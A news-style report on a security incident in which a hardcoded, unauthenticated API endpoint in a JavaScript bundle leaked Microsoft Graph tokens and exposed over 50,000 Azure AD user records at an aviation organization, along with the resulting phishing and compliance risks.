A notable security incident has emerged following the exposure of over 50,000 Azure Active Directory (AD) user records because of a hardcoded, unsecured API endpoint embedded within a JavaScript file. This incident, reported by CloudSEK’s BeVigil platform, reveals critical vulnerabilities within an organization in the aviation industry, raising alarms regarding infrastructure security.
The improperly secured API endpoint, which was publicly accessible and required no authentication, continuously leaked sensitive information for both existing and newly onboarded users. The hardcoded API was included in a JavaScript bundle utilized by a web application. This flaw permitted the issuance of Microsoft Graph API tokens that carried heightened permission levels, particularly User.Read.All and AccessReview.Read.All. These permissions allowed access to extensive user profiles and identity governance data, exposing details such as names, job titles, email addresses, and contact information, contributing to the risk of social engineering attacks. Notably, this exposure stems from a vulnerability identified on May 30, 2025, and a hardcoded endpoint provided access to sensitive data without authentication, greatly escalating concerns about potential targeted attacks against high-profile individuals.
The unsecured API endpoint leaked sensitive information continuously, impacting both existing and new users alike.
The ramifications of the exposure extend beyond mere data visibility; they encompass severe security and compliance risks. Cybercriminals now possess a widened attack surface, with opportunities for privilege escalation, identity theft, and sophisticated phishing campaigns on the table. With social engineering attacks contributing to 98% of cyberattacks, the exposed user information presents a significant threat to organizational security.
The likely violations of data privacy regulations, including GDPR and CCPA, may ensue, given the extensive exposure of personally identifiable information. Organizations managing sensitive identity data face intense scrutiny and potential fines because of the failure to protect API tokens and user information adequately.
From a technical perspective, the improper exposure of such tokens facilitates unauthorized, automated data harvesting from the Azure AD directory. The absence of authentication on the token-issuing endpoint undermines standard security protocols expected for the Microsoft Graph API, a stark reminder of the consequences that arise from overlooking basic security configurations.
The incident underlines a critical need for strong security practices in managing identity data.
